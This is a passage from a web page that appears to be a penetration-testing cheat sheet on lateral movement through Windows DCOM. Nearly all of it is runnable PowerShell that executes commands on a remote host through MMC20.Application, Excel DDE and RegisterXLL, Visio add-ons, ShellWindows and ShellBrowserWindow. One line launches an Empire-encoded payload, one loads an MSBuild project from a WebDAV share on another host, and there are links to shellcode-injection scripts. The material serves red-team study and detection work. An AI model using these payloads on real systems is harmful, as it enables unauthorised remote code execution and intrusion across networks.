<a id="__codelineno-1-12" name="__codelineno-1-12" href="#__codelineno-1-12"></a><span class="n">Current</span> <span class="n">Methods</span><span class="p">:</span> <span class="n">MMC20</span><span class="p">.</span><span class="n">Application</span><span class="p">,</span> <span class="n">ShellWindows</span><span class="p">,</span> <span class="n">ShellBrowserWindow</span><span class="p">,</span> <span class="n">ExcelDDE</span><span class="p">,</span> <span class="n">VisioAddonEx</span><span class="p">,</span> <span class="n">OutlookShellEx</span><span class="p">,</span> <span class="n">ExcelXLL</span><span class="p">,</span> <span class="n">VisioExecLine</span><span class="p">,</span> <span class="n">OfficeMacro</span><span class="p">.</span>
|
|
</code></pre></div></li>
|
|
<li>Invoke-DCOM - https://raw.githubusercontent.com/rvrsh3ll/Misc-Powershell-Scripts/master/Invoke-DCOM.ps1
|
|
<div class="highlight"><pre><span></span><code><a id="__codelineno-2-1" name="__codelineno-2-1" href="#__codelineno-2-1"></a><span class="nb">Import-Module</span> <span class="p">.\</span><span class="nb">Invoke-DCOM</span><span class="p">.</span><span class="n">ps1</span>
|
|
<a id="__codelineno-2-2" name="__codelineno-2-2" href="#__codelineno-2-2"></a><span class="nb">Invoke-DCOM</span> <span class="n">-ComputerName</span> <span class="s1">'10.10.10.10'</span> <span class="n">-Method</span> <span class="n">MMC20</span><span class="p">.</span><span class="n">Application</span> <span class="n">-Command</span> <span class="s2">"calc.exe"</span>
|
|
<a id="__codelineno-2-3" name="__codelineno-2-3" href="#__codelineno-2-3"></a><span class="nb">Invoke-DCOM</span> <span class="n">-ComputerName</span> <span class="s1">'10.10.10.10'</span> <span class="n">-Method</span> <span class="n">ExcelDDE</span> <span class="n">-Command</span> <span class="s2">"calc.exe"</span>
|
|
<a id="__codelineno-2-4" name="__codelineno-2-4" href="#__codelineno-2-4"></a><span class="nb">Invoke-DCOM</span> <span class="n">-ComputerName</span> <span class="s1">'10.10.10.10'</span> <span class="n">-Method</span> <span class="n">ServiceStart</span> <span class="s2">"MyService"</span>
|
|
<a id="__codelineno-2-5" name="__codelineno-2-5" href="#__codelineno-2-5"></a><span class="nb">Invoke-DCOM</span> <span class="n">-ComputerName</span> <span class="s1">'10.10.10.10'</span> <span class="n">-Method</span> <span class="n">ShellBrowserWindow</span> <span class="n">-Command</span> <span class="s2">"calc.exe"</span>
|
|
<a id="__codelineno-2-6" name="__codelineno-2-6" href="#__codelineno-2-6"></a><span class="nb">Invoke-DCOM</span> <span class="n">-ComputerName</span> <span class="s1">'10.10.10.10'</span> <span class="n">-Method</span> <span class="n">ShellWindows</span> <span class="n">-Command</span> <span class="s2">"calc.exe"</span>
|
|
</code></pre></div></li>
|
|
</ul>
|
|
<h2 id="dcom-via-mmc-application-class">DCOM via MMC Application Class</h2>
|
|
<p>This COM object (MMC20.Application) allows you to script components of MMC snap-in operations. there is a method named <strong>"ExecuteShellCommand"</strong> under <strong>Document.ActiveView</strong>.</p>
|
|
<div class="highlight"><pre><span></span><code><a id="__codelineno-3-1" name="__codelineno-3-1" href="#__codelineno-3-1"></a><span class="nb">PS </span><span class="n">C</span><span class="p">:\></span> <span class="nv">$com</span> <span class="p">=</span> <span class="no">[activator]</span><span class="p">::</span><span class="n">CreateInstance</span><span class="p">(</span><span class="no">[type]</span><span class="p">::</span><span class="n">GetTypeFromProgID</span><span class="p">(</span><span class="s2">"MMC20.Application"</span><span class="p">,</span><span class="s2">"10.10.10.1"</span><span class="p">))</span>
|
|
<a id="__codelineno-3-2" name="__codelineno-3-2" href="#__codelineno-3-2"></a><span class="nb">PS </span><span class="n">C</span><span class="p">:\></span> <span class="nv">$com</span><span class="p">.</span><span class="n">Document</span><span class="p">.</span><span class="n">ActiveView</span><span class="p">.</span><span class="n">ExecuteShellCommand</span><span class="p">(</span><span class="s2">"C:\Windows\System32\calc.exe"</span><span class="p">,</span><span class="nv">$null</span><span class="p">,</span><span class="nv">$null</span><span class="p">,</span><span class="n">7</span><span class="p">)</span>
|
|
<a id="__codelineno-3-3" name="__codelineno-3-3" href="#__codelineno-3-3"></a><span class="nb">PS </span><span class="n">C</span><span class="p">:\></span> <span class="nv">$com</span><span class="p">.</span><span class="n">Document</span><span class="p">.</span><span class="n">ActiveView</span><span class="p">.</span><span class="n">ExecuteShellCommand</span><span class="p">(</span><span class="s2">"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"</span><span class="p">,</span><span class="nv">$null</span><span class="p">,</span><span class="s2">"-enc DFDFSFSFSFSFSFSFSDFSFSF < Empire encoded string > "</span><span class="p">,</span><span class="s2">"7"</span><span class="p">)</span>
|
|
<a id="__codelineno-3-4" name="__codelineno-3-4" href="#__codelineno-3-4"></a>
|
|
<a id="__codelineno-3-5" name="__codelineno-3-5" href="#__codelineno-3-5"></a><span class="c"># Weaponized example with MSBuild</span>
|
|
<a id="__codelineno-3-6" name="__codelineno-3-6" href="#__codelineno-3-6"></a><span class="nb">PS </span><span class="n">C</span><span class="p">:\></span> <span class="no">[System.Activator]</span><span class="p">::</span><span class="n">CreateInstance</span><span class="p">(</span><span class="no">[type]</span><span class="p">::</span><span class="n">GetTypeFromProgID</span><span class="p">(</span><span class="s2">"MMC20.Application"</span><span class="p">,</span><span class="s2">"10.10.10.1"</span><span class="p">)).</span><span class="n">Document</span><span class="p">.</span><span class="n">ActiveView</span><span class="p">.</span><span class="n">ExecuteShellCommand</span><span class="p">(</span><span class="s2">"c:\windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"</span><span class="p">,</span><span class="nv">$null</span><span class="p">,</span><span class="s2">"\\10.10.10.2\webdav\build.xml"</span><span class="p">,</span><span class="s2">"7"</span><span class="p">)</span>
|
|
</code></pre></div>
|
|
<p>Invoke-MMC20RCE : https://raw.githubusercontent.com/n0tty/powershellery/master/Invoke-MMC20RCE.ps1</p>
|
|
<h2 id="dcom-via-office">DCOM via Office</h2>
|
|
<ul>
|
|
<li>Excel.Application</li>
|
|
<li>DDEInitiate</li>
|
|
<li>RegisterXLL</li>
|
|
<li>Outlook.Application</li>
|
|
<li>CreateObject->Shell.Application->ShellExecute</li>
|
|
<li>CreateObject->ScriptControl (office-32bit only)</li>
|
|
<li>Visio.InvisibleApp (same as Visio.Application, but should not show the Visio window)</li>
|
|
<li>Addons</li>
|
|
<li>ExecuteLine</li>
|
|
<li>Word.Application</li>
|
|
<li>RunAutoMacro</li>
|
|
</ul>
|
|
<div class="highlight"><pre><span></span><code><a id="__codelineno-4-1" name="__codelineno-4-1" href="#__codelineno-4-1"></a><span class="c"># Powershell script that injects shellcode into excel.exe via ExecuteExcel4Macro through DCOM</span>
|
|
<a id="__codelineno-4-2" name="__codelineno-4-2" href="#__codelineno-4-2"></a><span class="nb">Invoke-Excel4DCOM64</span><span class="p">.</span><span class="n">ps1</span> <span class="n">https</span><span class="p">://</span><span class="n">gist</span><span class="p">.</span><span class="n">github</span><span class="p">.</span><span class="n">com</span><span class="p">/</span><span class="n">Philts</span><span class="p">/</span><span class="n">85d0f2f0a1cc901d40bbb5b44eb3b4c9</span>
|
|
<a id="__codelineno-4-3" name="__codelineno-4-3" href="#__codelineno-4-3"></a><span class="nb">Invoke-ExShellcode</span><span class="p">.</span><span class="n">ps1</span> <span class="n">https</span><span class="p">://</span><span class="n">gist</span><span class="p">.</span><span class="n">github</span><span class="p">.</span><span class="n">com</span><span class="p">/</span><span class="n">Philts</span><span class="p">/</span><span class="n">f7c85995c5198e845c70cc51cd4e7e2a</span>
|
|
<a id="__codelineno-4-4" name="__codelineno-4-4" href="#__codelineno-4-4"></a>
|
|
<a id="__codelineno-4-5" name="__codelineno-4-5" href="#__codelineno-4-5"></a><span class="c"># Using Excel DDE</span>
|
|
<a id="__codelineno-4-6" name="__codelineno-4-6" href="#__codelineno-4-6"></a><span class="nb">PS </span><span class="n">C</span><span class="p">:\></span> <span class="nv">$excel</span> <span class="p">=</span> <span class="no">[activator]</span><span class="p">::</span><span class="n">CreateInstance</span><span class="p">(</span><span class="no">[type]</span><span class="p">::</span><span class="n">GetTypeFromProgID</span><span class="p">(</span><span class="s2">"Excel.Application"</span><span class="p">,</span> <span class="s2">"$ComputerName"</span><span class="p">))</span>
|
|
<a id="__codelineno-4-7" name="__codelineno-4-7" href="#__codelineno-4-7"></a><span class="nb">PS </span><span class="n">C</span><span class="p">:\></span> <span class="nv">$excel</span><span class="p">.</span><span class="n">DisplayAlerts</span> <span class="p">=</span> <span class="nv">$false</span>
|
|
<a id="__codelineno-4-8" name="__codelineno-4-8" href="#__codelineno-4-8"></a><span class="nb">PS </span><span class="n">C</span><span class="p">:\></span> <span class="nv">$excel</span><span class="p">.</span><span class="n">DDEInitiate</span><span class="p">(</span><span class="s2">"cmd"</span><span class="p">,</span> <span class="s2">"/c calc.exe"</span><span class="p">)</span>
|
|
<a id="__codelineno-4-9" name="__codelineno-4-9" href="#__codelineno-4-9"></a>
|
|
<a id="__codelineno-4-10" name="__codelineno-4-10" href="#__codelineno-4-10"></a><span class="c"># Using Excel RegisterXLL</span>
|
|
<a id="__codelineno-4-11" name="__codelineno-4-11" href="#__codelineno-4-11"></a><span class="c"># Can't be used reliably with a remote target</span>
|
|
<a id="__codelineno-4-12" name="__codelineno-4-12" href="#__codelineno-4-12"></a><span class="n">Require</span><span class="p">:</span> <span class="n">reg</span> <span class="n">add</span> <span class="n">HKEY_CURRENT_USER</span><span class="p">\</span><span class="n">Software</span><span class="p">\</span><span class="n">Microsoft</span><span class="p">\</span><span class="n">Office</span><span class="p">\</span><span class="n">16</span><span class="p">.</span><span class="n">0</span><span class="p">\</span><span class="n">Excel</span><span class="p">\</span><span class="n">Security</span><span class="p">\</span><span class="n">Trusted</span> <span class="n">Locations</span> <span class="p">/</span><span class="n">v</span> <span class="n">AllowsNetworkLocations</span> <span class="p">/</span><span class="n">t</span> <span class="n">REG_DWORD</span> <span class="p">/</span><span class="n">d</span> <span class="n">1</span>
|
|
<a id="__codelineno-4-13" name="__codelineno-4-13" href="#__codelineno-4-13"></a><span class="n">PS</span><span class="p">></span> <span class="nv">$excel</span> <span class="p">=</span> <span class="no">[activator]</span><span class="p">::</span><span class="n">CreateInstance</span><span class="p">(</span><span class="no">[type]</span><span class="p">::</span><span class="n">GetTypeFromProgID</span><span class="p">(</span><span class="s2">"Excel.Application"</span><span class="p">,</span> <span class="s2">"$ComputerName"</span><span class="p">))</span>
|
|
<a id="__codelineno-4-14" name="__codelineno-4-14" href="#__codelineno-4-14"></a><span class="n">PS</span><span class="p">></span> <span class="nv">$excel</span><span class="p">.</span><span class="n">RegisterXLL</span><span class="p">(</span><span class="s2">"EvilXLL.dll"</span><span class="p">)</span>
|
|
<a id="__codelineno-4-15" name="__codelineno-4-15" href="#__codelineno-4-15"></a>
|
|
<a id="__codelineno-4-16" name="__codelineno-4-16" href="#__codelineno-4-16"></a><span class="c"># Using Visio</span>
|
|
<a id="__codelineno-4-17" name="__codelineno-4-17" href="#__codelineno-4-17"></a><span class="nv">$visio</span> <span class="p">=</span> <span class="no">[activator]</span><span class="p">::</span><span class="n">CreateInstance</span><span class="p">(</span><span class="no">[type]</span><span class="p">::</span><span class="n">GetTypeFromProgID</span><span class="p">(</span><span class="s2">"Visio.InvisibleApp"</span><span class="p">,</span> <span class="s2">"$ComputerName"</span><span class="p">))</span>
|
|
<a id="__codelineno-4-18" name="__codelineno-4-18" href="#__codelineno-4-18"></a><span class="nv">$visio</span><span class="p">.</span><span class="n">Addons</span><span class="p">.</span><span class="n">Add</span><span class="p">(</span><span class="s2">"C:\Windows\System32\cmd.exe"</span><span class="p">).</span><span class="n">Run</span><span class="p">(</span><span class="s2">"/c calc"</span><span class="p">)</span>
|
|
</code></pre></div>
|
|
<h2 id="dcom-via-shellexecute">DCOM via ShellExecute</h2>
|
|
<div class="highlight"><pre><span></span><code><a id="__codelineno-5-1" name="__codelineno-5-1" href="#__codelineno-5-1"></a><span class="nv">$com</span> <span class="p">=</span> <span class="no">[Type]</span><span class="p">::</span><span class="n">GetTypeFromCLSID</span><span class="p">(</span><span class="s1">'9BA05972-F6A8-11CF-A442-00A0C90A8F39'</span><span class="p">,</span><span class="s2">"10.10.10.1"</span><span class="p">)</span>
|
|
<a id="__codelineno-5-2" name="__codelineno-5-2" href="#__codelineno-5-2"></a><span class="nv">$obj</span> <span class="p">=</span> <span class="no">[System.Activator]</span><span class="p">::</span><span class="n">CreateInstance</span><span class="p">(</span><span class="nv">$com</span><span class="p">)</span>
|
|
<a id="__codelineno-5-3" name="__codelineno-5-3" href="#__codelineno-5-3"></a><span class="nv">$item</span> <span class="p">=</span> <span class="nv">$obj</span><span class="p">.</span><span class="n">Item</span><span class="p">()</span>
|
|
<a id="__codelineno-5-4" name="__codelineno-5-4" href="#__codelineno-5-4"></a><span class="nv">$item</span><span class="p">.</span><span class="n">Document</span><span class="p">.</span><span class="n">Application</span><span class="p">.</span><span class="n">ShellExecute</span><span class="p">(</span><span class="s2">"cmd.exe"</span><span class="p">,</span><span class="s2">"/c calc.exe"</span><span class="p">,</span><span class="s2">"C:\windows\system32"</span><span class="p">,</span><span class="nv">$null</span><span class="p">,</span><span class="n">0</span><span class="p">)</span>
|
|
</code></pre></div>
|
|
<h2 id="dcom-via-shellbrowserwindow">DCOM via ShellBrowserWindow</h2>
|
|
<p><img alt="⚠" class="twemoji" src="https://cdn.jsdelivr.net/gh/jdecked/twemoji@15.1.0/assets/svg/26a0.svg" title=":warning:" /> Windows 10 only, the object doesn't exists in Windows 7</p>
|
|
<div class="highlight"><pre><span></span><code><a id="__codelineno-6-1" name="__codelineno-6-1" href="#__codelineno-6-1"></a><span class="nv">$com</span> <span class="p">=</span> <span class="no">[Type]</span><span class="p">::</span><span class="n">GetTypeFromCLSID</span><span class="p">(</span><span class="s1">'C08AFD90-F2A1-11D1-8455-00A0C91F3880'</span><span class="p">,</span><span class="s2">"10.10.10.1"</span><span class="p">)</span>
|
|
<a id="__codelineno-6-2" name="__codelineno-6-2" href="#__codelineno-6-2"></a><span class="nv">$obj</span> <span class="p">=</span> <span class="no">[System.Activator]</span><span class="p">::</span><span class="n">CreateInstance</span><span class="p">(</span><span class="nv">$com</span><span class="p">)</span>
|
|
<a id="__codelineno-6-3" name="__codelineno-6-3" href="#__codelineno-6-3"></a><span class="nv">$obj</span><span class="p">.</span><span class="n">Application</span><span class="p">.</span><span class="n">ShellExecute</span><span class="p">(</span><span class="s2">"cmd.exe"</span><span class="p">,</span><span class="s2">"/c calc.exe"</span><span class="p">,</span><span class="s2">"C:\windows\system32"</span><span class="p">,</span><span class="nv">$null</span><span class="p">,</span><span class="n">0</span><span class="p">)</span>
|
|
</code></pre></div>
|
|
<h2 id="references">References</h2>
|
|
<ul>
|
|
<li><a href="https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/">Lateral movement via dcom: round 2 - enigma0x3 - January 23, 2017</a></li>
|
|
<li><a href="https://www.cybereason.com/blog/dcom-lateral-movement-techniques">New lateral movement techniques abuse DCOM technology - Philip Tsukerman - Jan 25, 2018</a></li>
|
|
</ul>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<aside class="md-source-file">
|
|
|
|
|
|
<span class="md-source-file__fact">
|
|
<span class="md-icon" title="Last update">
|
|
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M21 13.1c-.1 0-.3.1-.4.2l-1 1 2.1 2.1 1-1c.2-.2.2-.6 0-.8l-1.3-1.3c-.1-.1-.2-.2-.4-.2m-1.9 1.8-6.1 6V23h2.1l6.1-6.1zM12.5 7v5.2l4 2.4-1 1L11 13V7zM11 21.9c-5.1-.5-9-4.8-9-9.9C2 6.5 6.5 2 12 2c5.3 0 9.6 4.1 10 9.3-.3-.1-.6-.2-1-.2s-.7.1-1 .2C19.6 7.2 16.2 4 12 4c-4.4 0-8 3.6-8 8 0 4.1 3.1 7.5 7.1 7.9l-.1.2z"/></svg>
|
|
</span>
|
|
<span class="git-revision-date-localized-plugin git-revision-date-localized-plugin-date">November 5, 2024</span>
|
|
</span>
|
|
|
|
|
|
|
|
|
|
|
|
</aside>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<div class="social-container">
|
|
<b>Share this content</b>
|
|
<div class="a2a_kit a2a_kit_size_32 a2a_default_style">
|
|
<a class="a2a_dd" href="https://www.addtoany.com/share"></a>
|
|
<a class="a2a_button_x"></a>
|
|
<a class="a2a_button_telegram"></a>
|
|
<a class="a2a_button_linkedin"></a>
|
|
<a class="a2a_button_email"></a>
|
|
<a class="a2a_button_microsoft_teams"></a>
|
|
</div>
|
|
<br>
|
|
<script async src="https://static.addtoany.com/menu/page.js"></script>
|
|
</div>
|
|
<script defer src="https://cloud.umami.is/script.js" data-website-id="49aad71c-7d98-4635-8bd5-b6799c8874f8"></script>
|
|
|
|
</article>
|
|
</div>
|
|
|
|
|
|
<script>var target=document.getElementById(location.hash.slice(1));target&&target.name&&(target.checked=target.name.startsWith("__tabbed_"))</script>
|
|
</div>
|
|
|
|
<button type="button" class="md-top md-icon" data-md-component="top" hidden>
|
|
|
|
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M13 20h-2V8l-5.5 5.5-1.42-1.42L12 4.16l7.92 7.92-1.42 1.42L13 8z"/></svg>
|
|
Back to top
|
|
</button>
|
|
|
|
</main>
|
|
|
|
<footer class="md-footer">
|
|
|
|
<div class="md-footer-meta md-typeset">
|
|
<div class="md-footer-meta__inner md-grid">
|
|
<div class="md-copyright">
|
|
|
|
|
|
Made with
|
|
<a href="https://squidfunk.github.io/mkdocs-material/" target="_blank" rel="noopener">
|
|
Material for MkDocs
|
|
</a>
|
|
|
|
</div>
|
|
|
|
</div>
|
|
</div>
|
|
</footer>
|
|
|
|
</div>
|
|
<div class="md-dialog" data-md-component="dialog">
|
|
<div class="md-dialog__inner md-typeset"></div>
|
|
</div>
|
|
|
|
|
|
<script id="__config" type="application/json">{"base": "../..", "features": ["content.code.copy", "content.action.edit", "content.action.view", "content.tooltips", "navigation.tracking", "navigation.top", "search.share", "search.suggest"], "search": "../../assets/javascripts/workers/search.6ce7567c.min.js", "translations": {"clipboard.copied": "Copied to clipboard", "clipboard.copy": "Copy to clipboard", "search.result.more.one": "1 more on this page", "search.result.more.other": "# more on this page", "search.result.none": "No matching documents", "search.result.one": "1 matching document", "search.result.other": "# matching documents", "search.result.placeholder": "Type to start searching", "search.result.term.missing": "Missing", "select.version": "Select version"}}</script>
|
|
|
|
|
|
<script src="../../assets/javascripts/bundle.83f73b43.min.js"></script>
|
|
|
|
|
|
</body>
|
|
</html> |